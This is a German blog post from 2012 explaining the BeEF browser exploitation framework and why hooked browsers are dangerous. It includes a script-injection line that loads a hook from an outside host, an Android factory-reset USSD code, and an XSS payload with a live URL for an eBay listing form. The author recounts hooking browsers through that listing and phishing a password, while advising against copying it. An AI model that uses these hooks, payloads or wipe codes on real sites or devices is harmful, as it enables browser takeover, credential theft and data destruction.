BeEF – kleiner Exkurs in das Browser Exploitation Framework

Veröffentlicht: 16. November 2012 in IT-Security, Netzwerke

„The quieter you become the more you are able to hear…“ – Back|Track Linux

BeEF, das Browser Exploitation Framework bietet dem Pentester viele Möglichkeiten andere Systeme zu testen bzw.
zu erkunden und ggf. vorhandene Schwachstellen auszunutzen.

BeEF-Linux

BeEF-Linux

In einer Website wird ein Javascript eingebunden, das die Verbindung zum BeEF-Rechner herstellt und der wiederum
uns die Möglichkeit bietet bestimmte Aktionen über den Browser der Zielperson auszuführen, bzw. vorzubereiten.

echo „<script language=’Javascript‘ src=’http://irgendwas.dyndns.org:3000/hook.js‘></script>&#8220;;

Der Benutzer bekommt von diesem Vorgang nichts mit, ist aber schon in die aufgestellte Falle getappt, wenn er
eine entsprechend preparierte Website besucht. Der Angreifer kann über ein in BeEF integriertes GUI direkt
alle Aktionen bequem steuern und überwachen.

BeEF-Login

BeEF-Login

Hier die Website mit eingefügtem Hook (und bevor jemand meckert, der Hook wurde zu Demozwecken
eingebunden und inzwischen wieder entfernt ;-)

StahlData-hooked

Ordnerstruktur von BeEF aus Angreifersicht unter Linux BT5:

BeEF-Folder

BeEF-Folder

Das grafische Interface von BeEF aus Sicht des Angreifers:

BeEF-View

BeEF-View

Das Interface ist einfach gehalten und bietet für Entwickler unter Linux Möglichkeiten leicht
selbst eigene Module zu programmieren. Für Insider: unten findet sich das „Project Looking Glas“,
welches ausschließlich von th3j35t3r genutzt wird. Nein,…es ist natürlich nicht das PLG von Jester ;-) und
dient hier nur zur Verdeutlichung (fake), wie einfach man selbst etwas in das Treeview einbinden kann.
Um gleich Gerüchten vor zu beugen ich bin nicht th3j35t3r , auch wenn mein Twitter-Nick mit ihm zusammen
auf Wikipedia in Verbindung gebracht wird. Ich habe damals lediglich seinen Shellcode für das Webkit entdeckt.

PLG-fake

PLG-fake – hey th3j35t3r not saying here your PLG is a fake. I know you got red socks bro ;)

Ich habe eingangs erwähnt, dass das Tool für Pentester ein durchaus interessantes Instrument darstellt.
Leider sehen das einige Menschen mit weniger guten Intentionen ebenso ;)
Was also könnte ein Angreifer mir schon groß mit einem „gehookten“ Browser an Schaden zufügen?

Die Antwort ist: fast ALLES!

  • Identitätsdiebstahl
  • Datenklau
  • Passwortklau
  • Installation von Malware
  • Remotelöschung von Geräten
  • Webcam ansteuern und Bilder übertragen
  • Sessioncookies erbeuten
  • unberechtigt Zugriff auf soziale Netzwerke erhalten
  • Telefonanrufe tätigen etc. etc. etc……

Und wo ich gerade bei Telefonanrufen bin hier ein Beispiel dazu:

Anruf-BeEF

Anruf-BeEF – Anklicken zur größeren Darstellung

Der Angreifer sendet lediglich welche Rufnummer gewählt werden soll.
Unter Windows etc. nicht sonderlich schlimm, aber ein Smartphone würde
an dieser Stelle mit einem kleinen zusätzlichen Trick ggf. sofort den Anruf starten!

Anruf

Anruf auf Nummer 123456

Es ist somit auch möglich ein Smartphone komplett zu löschen und auf den Auslieferungszustand
zurück zu setzen. Dafür muss lediglich bei einigen Androidgeräten diese Rufnummer übermittelt
werden „tel:*2767*3855%23“.

Noch immer nicht überzeugt, dass Sie durchaus über einen einfachen Websitebesuch ernsthaften
virtuellen Gefahren ausgesetz sein können? Und das trotz aktuellem Antivirenschutz und Firewalllösungen!

Sie besuchen „solche“ Seiten, die soetwas womöglich einschleusen könnten natürlich nicht. Korrekt?
Brauchen Sie auch nicht! Manche Webseiten bieten diesen „Service“ frei Haus, durch XSS (Cross site scripting)-
Lücken, die es einem Angreifer ermöglichen auf einer ganz normalen Webseite, die u.U. am Tag tausende
Menschen besuchen, gefährlichen Quellcode zu injezieren!

BeEF-Exploitpack

So kann schon der Besuch der eigenen Firmenwebseite zu einem unbemerkten kleinen Abenteuer werden.
Mit ungewissem Ausgang für alle Seiten ;)

Externer Link: Exploit-Combo BeEF & Metasploit für Shellzugriff
Externer Link: BeEF Erläuterungen & Installation

Don’t become a target ;)

Update (17.11.2012 – for educational purposes only):

Wie ich eben erfahren habe, ist Ebay mit einer ganz exclusiven XSS-Lücke in deren Verkaufsformularen ausgestattet.
Einfach mal einen Artikel verkaufen und in der HTML-Ansicht folgenden Code einfügen. Danach dann auf die Vorschau
gehen. Ein guter Platz für einen Hook oder?!

‚“–></style></script><script>alert(„opppps!“)</script>

Kostprobe gefällig? –> http://www.ebay.com/itm/181023275832?ssPageName=STRK%3AMESELX%3AIT&_trksid=p3984.m1555.l2649

Hier mein eigener Versuch…bereits in der Vorschau ist mein Hook aktiv! Jetzt noch ein „Super-Schnäppchen“ bei EBay
einstellen und ein Horde gehooked Browser kommandieren…

EBay-BeEFed

EBay-BeEFed via Vorschau… Ich würde sagen das hat Potential…

Und da wir auch gerne noch das Passwort des EBay-Users hätten servieren wir ihm unser Phishing:

EBay-Passklau

EBay-Passklau

Auf Seite des Angreifers wird dann nur noch ausgewertet:

EBay-Passwort

EBay-Passwort

Ich rate dringend davon ab diese Lücke „austesten“ zu wollen. EBay ist informiert
worden
 und wird sicher mitloggen wer-wann-was-wo versucht im HTML-View zu
manipulieren. 
Wie immer gilt: don’t do it!

Advertisements
Kommentare
  1. […] XSS-Lücken entstehen leicht, wenn eine Site Eingaben ermöglicht – etwa in Form eines Feedback-Formulars. 2011 hatte sogar die Site des Sicherheitsanbieters McAfee eine solche Schwachstelle enthalten. Wie die XSS-Lücke genau funktioniert, wird im Blog SDCybercom näher beschrieben. […]

  2. […] McAfee eine solche Schwachstelle enthalten. Wie eine XSS-Lücke genau funktioniert, wird im Blog SDCybercom näher beschrieben. Anwender, die sich vor XSS-Attacken schützen wollen, verwenden unter Firefox die Erweiterung […]

Eigenen Senf dazu geben

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s